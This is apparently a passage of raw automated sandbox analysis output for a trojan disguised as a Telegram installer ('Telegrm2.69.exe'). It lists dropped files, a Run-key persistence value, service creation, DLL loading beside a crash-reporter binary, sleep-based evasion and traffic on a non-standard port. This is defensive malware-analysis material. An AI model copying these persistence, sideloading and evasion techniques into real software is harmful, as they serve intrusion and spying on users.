Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC1E9BFC5_2_00000211DC1E9BFC
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC1DD42B5_2_00000211DC1DD42B
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC1D1D385_2_00000211DC1D1D38
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC1E6E705_2_00000211DC1E6E70
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC1E7E605_2_00000211DC1E7E60
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC1E1E585_2_00000211DC1E1E58
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC1D3EE85_2_00000211DC1D3EE8
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC1E60045_2_00000211DC1E6004
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC1D18385_2_00000211DC1D1838
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC1E78DC5_2_00000211DC1E78DC
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC1E81C05_2_00000211DC1E81C0
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC1E32BC5_2_00000211DC1E32BC
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC1E72F05_2_00000211DC1E72F0
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC1DFB385_2_00000211DC1DFB38
Source: Joe Sandbox ViewDropped File: C:\ProgramData\icret\arphaCrashReport64.exe E743E8FAC075A379161E1736388451E0AF0FDE7DA595EA9D15EEB5140E3E8271
Source: Joe Sandbox ViewDropped File: C:\ProgramData\icret\arphaDump64.dll 7FCD3560EF424424DBD26B8E1BA90CA0F6198AA1D0BDA44F92CB880F4666A1F1
Source: Telegrm2.69.exeStatic PE information: invalid certificate
Source: Telegrm2.69.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: Telegrm2.69.exeBinary or memory string: OriginalFilename vs Telegrm2.69.exe
Source: Telegrm2.69.exe, 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNemuDTrace.exeH vs Telegrm2.69.exe
Source: Telegrm2.69.exe, 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNemuDTrace.exeH vs Telegrm2.69.exe
Source: Telegrm2.69.exeBinary or memory string: OriginalFilenamepg^tMfc.exe8 vs Telegrm2.69.exe
Source: classification engineClassification label: mal60.troj.spyw.evad.winEXE@3/3@1/2
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: rand,OpenSCManagerA,CreateFileA,CloseHandle,CloseServiceHandle,CreateServiceA,WriteFile,DeleteService,CloseServiceHandle,CloseHandle,CloseServiceHandle,CloseHandle,StartServiceA,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle,DeleteFileA,0_2_030AF8D0
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: rand,OpenSCManagerA,CreateFileA,CloseHandle,CloseServiceHandle,CreateServiceA,WriteFile,DeleteService,CloseServiceHandle,CloseHandle,CloseServiceHandle,CloseHandle,StartServiceA,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle,DeleteFileA,2_2_0000024B6458F8D0
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: rand,OpenSCManagerA,CreateFileA,CloseHandle,CloseServiceHandle,CreateServiceA,WriteFile,DeleteService,CloseServiceHandle,CloseHandle,CloseServiceHandle,CloseHandle,StartServiceA,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle,DeleteFileA,5_2_00000211DC4CF8D0
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030A3560 lstrcat,GetComputerNameA,GetCurrentProcessId,LoadLibraryA,GetProcAddress,GetUserNameA,CreateToolhelp32Snapshot,lstrlen,_localtime64,wsprintfA,GetModuleFileNameA,0_2_030A3560
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_00007FF6E2D52CB0 CoCreateInstance,2_2_00007FF6E2D52CB0
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_00007FF6E2D564E0 LoadResource,LockResource,SizeofResource,2_2_00007FF6E2D564E0
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030AF8D0 rand,OpenSCManagerA,CreateFileA,CloseHandle,CloseServiceHandle,CreateServiceA,WriteFile,DeleteService,CloseServiceHandle,CloseHandle,CloseServiceHandle,CloseHandle,StartServiceA,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle,DeleteFileA,0_2_030AF8D0
Source: C:\Users\user\Desktop\Telegrm2.69.exeMutant created: \Sessions\1\BaseNamedObjects\Global\49ba59abbe56e057_29946
Source: C:\Users\user\Desktop\Telegrm2.69.exeMutant created: \Sessions\1\BaseNamedObjects\Global\49ba59abbe56e057_29943
Source: C:\Users\user\Desktop\Telegrm2.69.exeMutant created: \Sessions\1\BaseNamedObjects\Global\49ba59abbe56e057_29950
Source: C:\Users\user\Desktop\Telegrm2.69.exeFile created: C:\Windows\Temp\49ba59abbe56e057.logJump to behavior
Source: Telegrm2.69.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Telegrm2.69.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\Telegrm2.69.exe "C:\Users\user\Desktop\Telegrm2.69.exe"
Source: unknownProcess created: C:\ProgramData\icret\arphaCrashReport64.exe "C:\ProgramData\icret\arphaCrashReport64.exe"
Source: unknownProcess created: C:\ProgramData\icret\arphaCrashReport64.exe "C:\ProgramData\icret\arphaCrashReport64.exe"
Source: C:\Users\user\Desktop\Telegrm2.69.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Telegrm2.69.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\Telegrm2.69.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\Telegrm2.69.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\Telegrm2.69.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\Desktop\Telegrm2.69.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\Telegrm2.69.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Telegrm2.69.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\Telegrm2.69.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\Telegrm2.69.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\Telegrm2.69.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\Telegrm2.69.exeSection loaded: dinput8.dllJump to behavior
Source: C:\Users\user\Desktop\Telegrm2.69.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Users\user\Desktop\Telegrm2.69.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\Telegrm2.69.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\Telegrm2.69.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\Telegrm2.69.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\Telegrm2.69.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Telegrm2.69.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Telegrm2.69.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\Telegrm2.69.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\Telegrm2.69.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\Telegrm2.69.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\Telegrm2.69.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\Telegrm2.69.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\Telegrm2.69.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\Telegrm2.69.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\Telegrm2.69.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\Telegrm2.69.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: apphelp.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: arphadump64.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: mswsock.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: winmm.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: dinput8.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: winhttp.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: inputhost.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: propsys.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: wintypes.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: napinsp.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: wshbth.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: winrnr.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: sspicli.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: arphadump64.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: mswsock.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: winmm.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: dinput8.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: winhttp.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: inputhost.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: propsys.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: wintypes.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: napinsp.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: wshbth.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: winrnr.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeSection loaded: sspicli.dllJump to behavior
Source: Telegrm2.69.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: Telegrm2.69.exeStatic file information: File size 27643656 > 1048576
Source: Telegrm2.69.exeStatic PE information: section name: RT_CURSOR
Source: Telegrm2.69.exeStatic PE information: section name: RT_BITMAP
Source: Telegrm2.69.exeStatic PE information: section name: RT_ICON
Source: Telegrm2.69.exeStatic PE information: section name: RT_MENU
Source: Telegrm2.69.exeStatic PE information: section name: RT_DIALOG
Source: Telegrm2.69.exeStatic PE information: section name: RT_STRING
Source: Telegrm2.69.exeStatic PE information: section name: RT_ACCELERATOR
Source: Telegrm2.69.exeStatic PE information: section name: RT_GROUP_ICON
Source: Telegrm2.69.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x1a13600
Source: Telegrm2.69.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Telegrm2.69.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\workspace\NEMU\out\win.amd64\release\obj\NemuDTrace\NemuDTrace.pdb source: arphaCrashReport64.exe, arphaCrashReport64.exe, 00000005.00000002.2904377323.00000211DC4E8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904201868.00000211DC1D0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: D:\jenkins\workspace\ci.arphasdk.build\qtc_out\Release_X64\arphaCrashReport64.exe.pdb source: arphaCrashReport64.exe, 00000002.00000002.2904656659.00007FF6E2D72000.00000002.00000001.01000000.00000007.sdmp, arphaCrashReport64.exe, 00000002.00000000.1860273790.00007FF6E2D72000.00000002.00000001.01000000.00000007.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904709601.00007FF6E2D72000.00000002.00000001.01000000.00000007.sdmp, arphaCrashReport64.exe, 00000005.00000000.1941367126.00007FF6E2D72000.00000002.00000001.01000000.00000007.sdmp, arphaCrashReport64.exe.0.dr
Source: Binary string: C:\Users\Admin\Documents\Visual Studio 2008\Projects\D11\x64\Release\D11.pdb source: arphaCrashReport64.exe, 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904813498.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmp, arphaDump64.dll.0.dr
Source: Binary string: D:\workspace\NEMU\out\win.amd64\release\obj\NemuDTrace\NemuDTrace.pdb!` source: Telegrm2.69.exe, 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904377323.00000211DC4E8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904201868.00000211DC1D0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: Mfc.pdb source: Telegrm2.69.exe
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030A17D0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RegCreateKeyExA,RegOpenKeyExA,RegSetValueExA,lstrlen,RegSetValueExA,RegCloseKey,FreeLibrary,0_2_030A17D0
Source: arphaDump64.dll.0.drStatic PE information: real checksum: 0x217b16 should be: 0x21d056
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030C4E2E push rbp; iretd 0_2_030C4E38
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_02337B90 push eax; ret 0_2_02337B92
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_023381E0 push eax; ret 0_2_023381E2
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_02DB4218 push edi; ret 0_2_0305D3C4
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_02DC7854 pushfd ; ret 0_2_02DC7855
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B645A4E2E push rbp; iretd 2_2_0000024B645A4E38
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B626A0FC0 push eax; ret 2_2_0000024B626A0FC2
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B642A7854 pushfd ; ret 2_2_0000024B642A7855
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC4E4E2E push rbp; iretd 5_2_00000211DC4E4E38
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DA870FC0 push eax; ret 5_2_00000211DA870FC2
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC1E7854 pushfd ; ret 5_2_00000211DC1E7855
Source: C:\Users\user\Desktop\Telegrm2.69.exeFile created: C:\ProgramData\icret\arphaDump64.dllJump to dropped file
Source: C:\Users\user\Desktop\Telegrm2.69.exeFile created: C:\ProgramData\icret\arphaCrashReport64.exeJump to dropped file
Source: C:\Users\user\Desktop\Telegrm2.69.exeFile created: C:\ProgramData\icret\arphaDump64.dllJump to dropped file
Source: C:\Users\user\Desktop\Telegrm2.69.exeFile created: C:\ProgramData\icret\arphaCrashReport64.exeJump to dropped file
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030AF8D0 rand,OpenSCManagerA,CreateFileA,CloseHandle,CloseServiceHandle,CreateServiceA,WriteFile,DeleteService,CloseServiceHandle,CloseHandle,CloseServiceHandle,CloseHandle,StartServiceA,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle,DeleteFileA,0_2_030AF8D0
Source: C:\Users\user\Desktop\Telegrm2.69.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run pirxrmJump to behavior
Source: C:\Users\user\Desktop\Telegrm2.69.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run pirxrmJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 280
Source: unknownNetwork traffic detected: HTTP traffic on port 280 -> 49732
Source: C:\Users\user\Desktop\Telegrm2.69.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030A3560 lstrcat,GetComputerNameA,GetCurrentProcessId,LoadLibraryA,GetProcAddress,GetUserNameA,CreateToolhelp32Snapshot,lstrlen,_localtime64,wsprintfA,GetModuleFileNameA,0_2_030A3560
Source: C:\Users\user\Desktop\Telegrm2.69.exeWindow / User API: threadDelayed 7299Jump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeWindow / User API: threadDelayed 6294Jump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exeWindow / User API: threadDelayed 5775Jump to behavior
Source: C:\Users\user\Desktop\Telegrm2.69.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-24918
Source: C:\ProgramData\icret\arphaCrashReport64.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_2-40550
Source: C:\Users\user\Desktop\Telegrm2.69.exe TID: 6472Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Telegrm2.69.exe TID: 6692Thread sleep count: 7299 > 30Jump to behavior
Source: C:\Users\user\Desktop\Telegrm2.69.exe TID: 6692Thread sleep time: -72990s >= -30000sJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exe TID: 4304Thread sleep count: 6294 > 30Jump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exe TID: 4304Thread sleep time: -62940s >= -30000sJump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exe TID: 2540Thread sleep count: 5775 > 30Jump to behavior
Source: C:\ProgramData\icret\arphaCrashReport64.exe TID: 2540Thread sleep time: -57750s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Telegrm2.69.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\Telegrm2.69.exeLast function: Thread delayed
Source: C:\ProgramData\icret\arphaCrashReport64.exeLast function: Thread delayed
Source: C:\ProgramData\icret\arphaCrashReport64.exeLast function: Thread delayed
Source: C:\ProgramData\icret\arphaCrashReport64.exeLast function: Thread delayed
Source: C:\ProgramData\icret\arphaCrashReport64.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030AEF20 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_030AEF20
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B6458EF20 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_0000024B6458EF20
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_00007FF6E2D68F78 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,2_2_00007FF6E2D68F78
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC4CEF20 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00000211DC4CEF20
Source: Telegrm2.69.exe, 00000000.00000003.2372902793.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2903639455.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2903854396.000000000074B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Telegrm2.69.exe, 00000000.00000003.2372902793.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2903854396.000000000074B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWf
Source: arphaCrashReport64.exe, 00000002.00000002.2903876416.0000024B626BC000.00000004.00000020.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2903815702.00000211DA5B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\Telegrm2.69.exeAPI call chain: ExitProcess graph end nodegraph_0-25070
Source: C:\ProgramData\icret\arphaCrashReport64.exeAPI call chain: ExitProcess graph end nodegraph_2-40486
Source: C:\ProgramData\icret\arphaCrashReport64.exeAPI call chain: ExitProcess graph end nodegraph_2-40158
Source: C:\ProgramData\icret\arphaCrashReport64.exeAPI call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Telegrm2.69.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_02DB0020 NtAllocateVirtualMemory,LdrLoadDll,0_2_02DB0020
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030B5518 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_030B5518
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_00007FF6E2D5D1E8 GetLastError,IsDebuggerPresent,OutputDebugStringW,2_2_00007FF6E2D5D1E8
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030A3560 lstrcat,GetComputerNameA,GetCurrentProcessId,LoadLibraryA,GetProcAddress,GetUserNameA,CreateToolhelp32Snapshot,lstrlen,_localtime64,wsprintfA,GetModuleFileNameA,0_2_030A3560
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030A17D0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RegCreateKeyExA,RegOpenKeyExA,RegSetValueExA,lstrlen,RegSetValueExA,RegCloseKey,FreeLibrary,0_2_030A17D0
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030B2020 free,VirtualFree,GetProcessHeap,HeapFree,0_2_030B2020
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030B5518 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_030B5518
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030B4565 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_030B4565
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030B2C00 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_030B2C00
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B64594565 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0000024B64594565
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B64595518 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0000024B64595518
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B64592C00 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0000024B64592C00
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_00007FF6E2D5ED0C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF6E2D5ED0C
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_00007FF6E2D5E440 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF6E2D5E440
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_00007FF6E2D621D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF6E2D621D8
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_00007FF6E2D5EEF4 SetUnhandledExceptionFilter,2_2_00007FF6E2D5EEF4
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_00007FFDFB8B233C RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFDFB8B233C
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_00007FFDFB8B69DC RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFDFB8B69DC
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_00007FFDFB8B15B0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFDFB8B15B0
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC4D2C00 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00000211DC4D2C00
